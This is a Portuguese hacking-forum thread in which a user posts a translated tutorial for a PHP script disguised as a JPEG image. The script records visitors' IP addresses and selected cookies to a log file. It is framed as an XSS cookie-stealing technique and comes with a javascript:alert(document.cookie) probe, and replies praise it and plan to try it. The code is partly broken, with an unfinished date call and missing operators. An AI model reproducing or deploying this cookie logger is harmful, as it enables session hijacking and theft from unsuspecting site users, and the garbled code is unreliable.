aew pessoal esse e o meu 100 post lol! então vou postar mais um tutorial bem explicado pra vocês!!!
Vamos começar do basico não se preucupem vou explicar tudo o maximo que puder
<?php
header("Content-type: image/jpeg");
$i = getenv("REMOTE_ADDR");
$d = date(
$intofile = $i "@" $d . "<br />" ...
1 Aqui e a parte aonde começa o PHP (obvio ne...)
2 header("Content-type: image/jpeg");
Define que isso vai ser uma imagens JPEG.
3 $i = getenv("REMOTE_ADDR");
Pega o endereço de IP
4 $d = date(l, F d, H:i:s)
Define o formato da data
5 $t = $i "@" $d . "
" ...
O começo do que você vai por no arquivo de sua escolha. Atenção ainda não coloque o ;
Agora vai uma parte facil que apenas requer um pequeno evento de Javascript.
Vá no site de sua escolha q você esta colocando isso,e nao barra de url digite
javascript:alert(document.cookie)
Escolha os cookies que quizer e coloque na variavel $t,veja um exemplo;
$HTTP_COOKIE_VARS['cookie_numero1'] . "<br />" . $HTTP_COOKIE_VA
RS['cookie_numero2'] . <br />;
Agora e a parte que vamos roubar os cookies.
Lembre-se que o PHP não converte o HEX para você.
Agora o resto sera facil.note que agora eu terminei a variavel $t com ; agora poderemos completar o resto do documento.
Agora adicione isso ao seu arquivo:
$f = fopen("logging.txt", "a");
fwrite($f, $t);
fclose($f);
$bg = imagecreatefromjpeg("background.jpg");
imagejpeg($bg);
imagedestroy($bg);
?>
Isso e facil agora vamos ver a explicação
6 $f = fopen("cookie/ip.txt", "a");
Define em que arquivo ficar seus cookies/IPS.
7 fwrite($f, $t);
Escreve o conteudo da variavel $t no cookie/ip.txt.
8 fclose($f);
Fecha o arquivo $f.
9 $bg = imagecreatefromjpeg("background.jpg");
Define a imagem que você quer.
10 imagejpeg($bg);
Cria a imagen.
11 imagedestroy($bg);
Termina a criação do documento.
12 ?>
Fecha a tag do PHP
Agora coloque o arqivo PHP em algum diretorio o fundo de sua escolha no msm diretorio e a seu cookie/ips.txt com CFMODDED 777,e o .htaccess com ele.
Pronto!
Pra enteder melhor aconselho a verem o video:
http://www.milw0rm.com/video/ (http://www.milw0rm.com/video/)
XSS
Fonte:
HTS.org
Tradução:
Wolff123
Ponto wolf, parabens
Valeu pelo centésimo post cara!!
Ele está sem dúvida muito explicativo e ainda com um vídeo.
Sucesso,
H4xn3tw0rk
isso nao devia estar na seçao php?
muito loko vo testar cocerteza
Quote from: "bloodrain"isso nao devia estar na seçao php?
E php, mas tambem e uma tecnica hacker ao inves de programacao comum
aeee show de bola cara... mto bom tuto... parabéns
Outra técnica muito boa, mas novamente, esqueceu de citar a fonte cara:
http://www.hackthissite.org/articles/read/427 (http://www.hackthissite.org/articles/read/427)
[]s
Desculpa fonte colocada!!!